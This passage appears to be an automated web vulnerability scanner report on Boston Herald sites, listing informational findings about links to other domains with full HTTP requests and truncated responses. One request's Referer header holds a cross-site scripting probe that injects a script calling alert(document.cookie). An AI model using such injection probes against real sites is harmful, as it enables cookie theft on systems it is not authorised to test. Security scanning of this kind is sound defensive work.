Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 1860
Connection: close
Content-Type: text/html

<style type="text/css">
/* div { top: 0px; } */
</style>


<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Bottom"></script>
...[SNIP]...
<noscript>
<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_nx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Bottom?x"><IMG
SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_nx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Bottom?x" BORDER="0"></a>
...[SNIP]...

17.147. http://bh.heraldinteractive.com/includes/processAds.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.heraldinteractive.com
Path:	/includes/processAds.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome

The response contains the following links to other domains:

http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top
http://oascentral.bostonherald.com/RealMedia/ads/adstream_nx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top?x
http://oascentral.bostonherald.com/RealMedia/ads/click_nx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top?x

Request

GET /includes/processAds.bg?position=Top&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:28 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 1848
Connection: close
Content-Type: text/html

<style type="text/css">
/* div { top: 0px; } */
</style>


<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top"></script>
...[SNIP]...
<noscript>
<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_nx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top?x"><IMG
SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_nx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Top?x" BORDER="0"></a>
...[SNIP]...

17.148. http://bh.heraldinteractive.com/includes/processAds.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.heraldinteractive.com
Path:	/includes/processAds.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome

The response contains the following links to other domains:

http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle
http://oascentral.bostonherald.com/RealMedia/ads/adstream_nx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle?x
http://oascentral.bostonherald.com/RealMedia/ads/click_nx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle?x

Request

GET /includes/processAds.bg?position=Middle&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:28 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 1867
Connection: close
Content-Type: text/html

<style type="text/css">
/* div { top: 0px; } */
</style>


<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle"></script>
...[SNIP]...
<noscript>
<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_nx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle?x"><IMG
SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_nx.ads/bh.heraldinteractive.com/home@Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom!Middle?x" BORDER="0"></a>
...[SNIP]...

17.149. http://bh.heraldinteractive.com/includes/processAds.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.heraldinteractive.com
Path:	/includes/processAds.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch

The response contains the following links to other domains:

http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Top
http://oascentral.bostonherald.com/RealMedia/ads/adstream_nx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Top?x
http://oascentral.bostonherald.com/RealMedia/ads/click_nx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Top?x

Request

GET /includes/processAds.bg?position=Top&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch HTTP/1.1
Host: bh.heraldinteractive.com
Proxy-Connection: keep-alive
Referer: http://hosted.ap.org/dynamic/external/ibd.morningstar.com/AP/TickerLookup.html?CN=AP707&ticker=e6c61%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7231934c67
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 14:31:11 GMT
Server: Apache/2.2.4 (Unix) PHP/5.2.0-8+etch11
X-Powered-By: PHP/5.2.0-8+etch11
Content-Length: 1842
Connection: close
Content-Type: text/html

<style type="text/css">
/* div { top: 0px; } */
</style>


<SCRIPT LANGUAGE="JavaScript1.1" SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_jx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Top"></script>
...[SNIP]...
<noscript>
<A HREF="http://oascentral.bostonherald.com/RealMedia/ads/click_nx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Top?x"><IMG
SRC="http://oascentral.bostonherald.com/RealMedia/ads/adstream_nx.ads/bh.heraldinteractive.com/business/general/marketresearch@Top,Middle,Bottom!Top?x" BORDER="0"></a>
...[SNIP]...

17.150. http://boston30.autochooser.com/results.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boston30.autochooser.com
Path:	/results.asp

Issue detail

The page was loaded from a URL containing a query string:

http://boston30.autochooser.com/results.asp?gid=0&pagename=dealersearch.asp&resulttype=2&postto=results.asp

The response contains the following links to other domains:

http://www.bostonherald.com/images/1x1.gif
http://www.bostonherald.com/navigation/hiasysMJX.js
http://www.carfind.com/
http://www.carfind.com/dealerSearch/dealerRequest.bg
http://www.carfind.com/dealerSpecials/
http://www.carfind.com/images/gas120x120.gif
http://www.carfind.com/images/top1.gif
http://www.carfind.com/images/top2.gif
http://www.carfind.com/images/top3.gif
http://www.carfind.com/images/top4.gif
http://www.carfind.com/navigation/style.css
http://www.carfind.com/news/
http://www.carfind.com/searchOther.bg
http://www.carfind.com/sellCar.bg
http://www.google-analytics.com/urchin.js
http://www.hiasys.com/
http://www.hiasys.com/pc.html
http://www.homefind.com/
http://www.homefind.com/include/bgNavEng2.js
http://www.jobfind.com/

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:31 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON DSP COR CURa ADMa DEVa TAIa OUR SAMa IND", POLICYREF="URI"
Content-Type: text/html
Expires: Fri, 28 Jan 2011 05:20:30 GMT
Set-Cookie: cid=4473401; expires=Tue, 25-Dec-2012 05:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSSQCBSCQ=ILBLDIICKPOMNHFEBBFBBIPG; path=/
Cache-control: private
Content-Length: 74164

<HTML>
<HEAD>
<TITLE>Quick Search</TITLE>
<META NAME="ROBOTS" CONTENT="NOFOLLOW">
<script language="JavaScript">
<!--

   function saveFavorites() {
       if (document.results) {
           document.resu
...[SNIP]...
</SCRIPT>

<link rel=stylesheet type="text/css" href="http://www.carfind.com/navigation/style.css">

<script src="http://www.bostonherald.com/navigation/hiasysMJX.js" LANGUAGE="JavaScript1.1" TYPE="text/javascript"></script>
...[SNIP]...
</style>
<script src="http://www.homefind.com/include/bgNavEng2.js" language="JavaScript1.1" type="text/javascript" ></script>
...[SNIP]...
<td><a href=http://www.carfind.com><img border="0" src="http://www.carfind.com/images/top1.gif" width="269" height="77"></a>
...[SNIP]...
<td colspan="2" bgcolor="#996633"><img border="0" src="http://www.carfind.com/images/top2.gif" width="269" height="19"></td></tr><tr>
<td colspan="2" bgcolor="#FFFFFF"><img border="0" src="http://www.carfind.com/images/top3.gif" width="268" height="1"></td>
...[SNIP]...
<td width="48"><img border="0" src="http://www.carfind.com/images/top4.gif" width="48" height="20"></td>
...[SNIP]...
<td class=whiteCell width=1><img src=http://www.bostonherald.com/images/1x1.gif width="1" height="1"></td>
...[SNIP]...
<td align=center bgcolor="#EA8C00" onMouseOver="mOverNav(this,'sell a car','ho')" onMouseOut="mOutNav(this,'','ho')"><a href=http://www.carfind.com/sellCar.bg target=_top><font class=button2font color=#FFFFFF>
...[SNIP]...
<td align=center bgcolor="#EA8C00" onMouseOver="mOverNav(this,'other','hf')" onMouseOut="mOutNav(this,'','so')"><a href=http://www.carfind.com/searchOther.bg target=_top><font class=button2font color=#FFFFFF>
...[SNIP]...
<td align=center bgcolor="#EA8C00" onMouseOver="mOverNav(this,'news & reviews','hf')" onMouseOut="mOutNav(this,'','sr')"><a href=http://www.carfind.com/news/ target=_top><font class=button2font color=#FFFFFF>
...[SNIP]...
<td align=center bgcolor="#EA8C00" onMouseOver="mOverNav(this,'dealer specials','hf')" onMouseOut="mOutNav(this,'','sr')"><a href=http://www.carfind.com/dealerSpecials/ target=_top><font class=button2font color=#FFFFFF>
...[SNIP]...
<td align=center bgcolor="#C5AF7D" onMouseOver="mOverNav2(this,'for dealers','hf')" onMouseOut="mOutNav2(this,'','sk')"><a href=http://www.carfind.com/dealerSearch/dealerRequest.bg target=_top><font class=button2font color=#FFFFFF>
...[SNIP]...
<br>
<a href=http://www.carfind.com/dealerSpecials/><img src=http://www.carfind.com/images/gas120x120.gif border=0></a>
...[SNIP]...
<b><a href=http://www.carfind.com/dealerSearch/dealerRequest.bg><font color=#CC6600>
...[SNIP]...
</font><a href="http://www.carfind.com/"><font color="#CC6600">
...[SNIP]...
</font><a href="http://www.carfind.com/sellCar.bg"><font color="#CC6600">
...[SNIP]...
</font><a href="http://www.carfind.com"><font color="#CC6600">
...[SNIP]...
</font><a href="http://www.jobfind.com" target="_new"><font color="#CC6600">
...[SNIP]...
</font><a href="http://www.homefind.com"><font color="#CC6600">
...[SNIP]...
<font class="storyFont"><a href="http://www.hiasys.com" target="_blank"><font color="#c0c0c0">
...[SNIP]...
<font class="storyFont"><a href="http://www.hiasys.com/pc.html"><font color="#c0c0c0">
...[SNIP]...
</table>

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

17.151. http://bostonherald.com/blogs/entertainment/the_assistant/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/blogs/entertainment/the_assistant/

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/blogs/entertainment/the_assistant/?p=3065

The response contains the following links to other domains:

http://cache.heraldinteractive.com/CSS/dropdown.css
http://cache.heraldinteractive.com/CSS/index.css
http://cache.heraldinteractive.com/CSS/subnavigation.css
http://cache.heraldinteractive.com/CSS/tabbed.css
http://cache.heraldinteractive.com/CSS/universal.css
http://cache.heraldinteractive.com/images/siteImages/blogLogos/the_assistant.jpg?sdf=sdfs
http://cache.heraldinteractive.com/images/siteImages/header/blogs/logoInsideBlogs.gif
http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif
http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif
http://cache.heraldinteractive.com/images/siteImages/icons/xmlgrey.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://cache.heraldinteractive.com/siteImages/icons/xml_sm.gif
http://en.wikipedia.org/wiki/Patty_Hearst
http://feeds.feedburner.com/bostonherald/
http://models.com/oftheminute/archives/images/Lydia-Hearst.jpg
http://nymag.com/daily/intel/2008/10/page_six_busts_lyin_lydia_hear.html
http://www.carfind.com/
http://www.dailymail.co.uk/tvshowbiz/article-1350862/Jeff-Goldblum-shares-kisses-model-heiress-Lydia-Hearst-Shaw.html
http://www.hollywoodbackwash.com/wp-content/uploads/2010/12/lydia-and-jeff.jpg
http://www.homefind.com/
http://www.youtube.com/embed/9ZHh9ckRC6M
http://www.youtube.com/embed/eEsZ23aZEK4

Request

GET /blogs/entertainment/the_assistant/?p=3065 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://bostonherald.com/blogs/entertainment/the_assistant/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<meta name="SUBSECTION" content="Blogs" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/universal.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/tabbed.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/index.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/dropdown.css" media="screen,projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/subnavigation.css" media="screen,projection" />

   <link rel="stylesheet" type="text/css" href="/CSS/blogs.css" media="screen,projection" />
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<a href="/blogs/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/blogs/logoInsideBlogs.gif" alt="Blogs" /></a>
...[SNIP]...
div id="carfind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a class="displayBlock" href="http://www.carfind.com"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Carfind" />Carfind</a>
...[SNIP]...
iv id="homefind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a class="displayBlock" href="http://www.homefind.com"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Homefind" />Homefind</a>
...[SNIP]...
<a class="displayBlock" href="/jobfind/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Jobfind" />Jobfind</a>
...[SNIP]...
<a href="/blogs/news/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />News & Business Blogs</a>
...[SNIP]...
<a href="/blogs/sports/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />Sports Blogs</a>
...[SNIP]...
<a href="/blogs/entertainment/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />Entertainment Blogs</a>
...[SNIP]...
<a href="/blogs/lifestyle/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />Lifestyle Blogs</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/xmlgrey.gif" alt="Boston Herald RSS" /></a>
...[SNIP]...
<p><a href="http://www.hollywoodbackwash.com/wp-content/uploads/2010/12/lydia-and-jeff.jpg"><img class="aligncenter" src="http://www.hollywoodbackwash.com/wp-content/uploads/2010/12/lydia-and-jeff.jpg" alt="" width="500" height="431" /></a>
...[SNIP]...
<p><a href="http://models.com/oftheminute/archives/images/Lydia-Hearst.jpg"><img class="aligncenter" src="http://models.com/oftheminute/archives/images/Lydia-Hearst.jpg" alt="" width="350" height="456" /></a></p>
<p>Jeff is know for liking the young ladies, as the UK’s Daily Mail <a href="http://www.dailymail.co.uk/tvshowbiz/article-1350862/Jeff-Goldblum-shares-kisses-model-heiress-Lydia-Hearst-Shaw.html" target="_blank">points out</a>
...[SNIP]...
<p><iframe title="YouTube video player" class="youtube-player" type="text/html" width="480" height="390" src="http://www.youtube.com/embed/9ZHh9ckRC6M" frameborder="0" allowFullScreen></iframe>
...[SNIP]...
corner booth of some fancy restaurant and drinks straight tequila and pretends to be Ernest Hemingway? Oh, well when searching for the article, I just discovered that Daily Intel says she didn’t <a href="http://nymag.com/daily/intel/2008/10/page_six_busts_lyin_lydia_hear.html" target="_blank">write it at all</a>. Whatever. I’m more concerned with the fact that you’re doing a 60 year old. AND that she’s the daughter of the queen of kidnapped heiresses turned vigilante bank robbers,<a href="http://en.wikipedia.org/wiki/Patty_Hearst" target="_blank"> Patty Hearst</a>
...[SNIP]...
<p><iframe title="YouTube video player" class="youtube-player" type="text/html" width="480" height="390" src="http://www.youtube.com/embed/eEsZ23aZEK4" frameborder="0" allowFullScreen></iframe>
...[SNIP]...
<font class=bodyFont color=#333333>

<img src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/the_assistant.jpg?sdf=sdfs" style="float:left">


<strong>
...[SNIP]...
<a href=http://bostonherald.com/blogs/entertainment/the_assistant/?feed=rss2><img src=http://cache.heraldinteractive.com/siteImages/icons/xml_sm.gif border=0></a>
...[SNIP]...

17.152. http://bostonherald.com/blogs/lifestyle/fork_lift/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/blogs/lifestyle/fork_lift/

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/blogs/lifestyle/fork_lift/?p=3679

The response contains the following links to other domains:

http://cache.heraldinteractive.com/CSS/dropdown.css
http://cache.heraldinteractive.com/CSS/index.css
http://cache.heraldinteractive.com/CSS/subnavigation.css
http://cache.heraldinteractive.com/CSS/tabbed.css
http://cache.heraldinteractive.com/CSS/universal.css
http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_662x120.jpg
http://cache.heraldinteractive.com/images/siteImages/header/blogs/logoInsideBlogs.gif
http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif
http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif
http://cache.heraldinteractive.com/images/siteImages/icons/xmlgrey.gif
http://cache.heraldinteractive.com/images/siteImages/reporters/donnaGoodison.gif?123=4234
http://cache.heraldinteractive.com/images/siteImages/reporters/juliaRappaport.gif
http://cache.heraldinteractive.com/images/siteImages/reporters/kerryByrne.gif
http://cache.heraldinteractive.com/images/siteImages/reporters/matSchaffer_phantom.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://cache.heraldinteractive.com/siteImages/icons/xml_sm.gif
http://coldhardfootballfacts.com/
http://feeds.feedburner.com/bostonherald/
http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1170.snc4/154264_180150921996846_120515841293688_635022_7871232_n.jpg
http://sportsillustrated.cnn.com/writers/kerry_byrne/archive/
http://topsy.com/trackback?url=http%3A%2F%2Fbostonherald.com%2Fblogs%2Flifestyle%2Ffork_lift%2F%3Fp%3D3679&utm_source=pingback&utm_campaign=L2
http://twitter.com/Julia_Rappaport
http://www.carfind.com/
http://www.homefind.com/
http://www.ottoportland.com/

Request

GET /blogs/lifestyle/fork_lift/?p=3679 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:21:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
X-Pingback: http://bostonherald.com/blogs/lifestyle/fork_lift/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 60730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<TITLE>BostonHerald.com
...[SNIP]...
<meta name="SUBSECTION" content="Blogs" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/universal.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/tabbed.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/index.css" media="screen, projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/dropdown.css" media="screen,projection" />
   <link rel="stylesheet" type="text/css" href="http://cache.heraldinteractive.com/CSS/subnavigation.css" media="screen,projection" />

   <link rel="stylesheet" type="text/css" href="/CSS/blogs.css" media="screen,projection" />
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/prototype.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<a href="/blogs/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/blogs/logoInsideBlogs.gif" alt="Blogs" /></a>
...[SNIP]...
div id="carfind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a class="displayBlock" href="http://www.carfind.com"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Carfind" />Carfind</a>
...[SNIP]...
iv id="homefind" class="tabAlternate" onmouseover="this.className = this.className + 'Hover'; return false;" onmouseout="this.className = this.className.replace('Hover', ''); return false;" onclick=""><a class="displayBlock" href="http://www.homefind.com"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Homefind" />Homefind</a>
...[SNIP]...
<a class="displayBlock" href="/jobfind/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerNavBarBullet.gif" alt="Jobfind" />Jobfind</a>
...[SNIP]...
<a href="/blogs/news/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />News & Business Blogs</a>
...[SNIP]...
<a href="/blogs/sports/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />Sports Blogs</a>
...[SNIP]...
<a href="/blogs/entertainment/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />Entertainment Blogs</a>
...[SNIP]...
<a href="/blogs/lifestyle/"><img src="http://cache.heraldinteractive.com/images/siteImages/header/headerSubNavBullet.gif"
alt="Bullet" />Lifestyle Blogs</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/"><img src="http://cache.heraldinteractive.com/images/siteImages/icons/xmlgrey.gif" alt="Boston Herald RSS" /></a>
...[SNIP]...
<a href="/blogs/lifestyle/fork_lift/"><img width="638" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_662x120.jpg" /></a>
...[SNIP]...
<span id="ucPreviewMsg_lblMessage" class="PreviewMsgText visualIEFloatFix">This evening at 5 p.m., the gourmet Portland, Maine-based pizzeria <a href="http://www.ottoportland.com">Otto Pizza</a>
...[SNIP]...
<p><img class="aligncenter" src="http://sphotos.ak.fbcdn.net/hphotos-ak-snc4/hs1170.snc4/154264_180150921996846_120515841293688_635022_7871232_n.jpg" alt="" width="582" height="440" /></p>
...[SNIP]...
<b><a href='http://topsy.com/trackback?url=http%3A%2F%2Fbostonherald.com%2Fblogs%2Flifestyle%2Ffork_lift%2F%3Fp%3D3679&utm_source=pingback&utm_campaign=L2' rel='external nofollow'>Twitter Trackbacks for BostonHerald.com - Blogs: Fork Lift.. Blog Archive .. What to Eat Tonight: Pizza from Harvard Square...s Latest Joint [bostonherald.com] on Topsy.com</a>
...[SNIP]...
<br />

<img src="http://cache.heraldinteractive.com/images/siteImages/reporters/kerryByrne.gif" style="float:left; border: 1px #000 solid;">

<b>
...[SNIP]...
is career here
writing one of the nation's first newspaper beer columns. In his spare time,
he pens thoughtful Buffalo wing-themed haiku and publishes the critically
acclaimed <a href="http://ColdHardFootballFacts.com">ColdHardFootballFacts.com</a>. Kerry also writes for <a href="http://sportsillustrated.cnn.com/writers/kerry_byrne/archive/">SportsIllustrated.com</a>
...[SNIP]...
</div>

<img src="http://cache.heraldinteractive.com/images/siteImages/reporters/donnaGoodison.gif?123=4234" style="float:left; border: 1px #000 solid;">
<b>
...[SNIP]...
</div>

<img src="http://cache.heraldinteractive.com/images/siteImages/reporters/juliaRappaport.gif" style="float:left; border: 1px #000 solid">

<b>
...[SNIP]...
</b> is Assistant Arts and Lifestyle Editor at the Boston Herald,
where she writes the Sips column. An aspiring bon vivant, you can follow her
work and play at <a href="http://twitter.com/Julia_Rappaport">twitter.com/ Julia_Rappaport</a>
...[SNIP]...
<br>

<img src="http://cache.heraldinteractive.com/images/siteImages/reporters/matSchaffer_phantom.gif" style="float:left; border: 1px #000 solid;">

<b>
...[SNIP]...
<a href=http://bostonherald.com/blogs/lifestyle/fork_lift/?feed=rss2><img src=http://cache.heraldinteractive.com/siteImages/icons/xml_sm.gif border=0></a>
...[SNIP]...

17.153. http://bostonherald.com/news/document.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/document.bg

Issue detail

The page was loaded from a URL containing a query string:

